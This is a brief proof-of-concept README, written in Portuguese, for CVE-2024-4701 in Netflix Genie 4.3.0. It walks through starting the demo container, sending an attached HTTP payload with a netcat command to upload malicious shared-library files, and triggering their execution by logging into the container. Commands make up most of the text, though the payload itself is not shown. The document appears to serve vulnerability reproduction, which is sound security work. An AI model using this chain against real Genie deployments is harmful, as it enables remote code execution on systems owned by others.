
POC para CVE-2024-4701
POC para CVE-2024-4701
Baixe o arquivo docker do genie em https://netflix.github.io/genie/docs/4.3.0/demo/docker-compose.yml ou deste repositório
execute
docker-compose up
Baixe o payload http anexado loadlib
Execute o seguinte comando
nc -w 5 localhost 8080 < loadlib
Talvez seja necessário instalar o netcat ( nc )
Isso enviará o payload para o aplicativo genie em execução no docker, que faz o upload dos arquivos pe.so e ld.so.upload.
Em seguida, faça login no contêiner docker genie-app
docker exec -it genie_demo_app_4.3.0 /bin/bash
O ato de fazer login aciona a execução da biblioteca maliciosa, então basta executar
ls /tmp/
Para ver o arquivo command.out gravado em disco.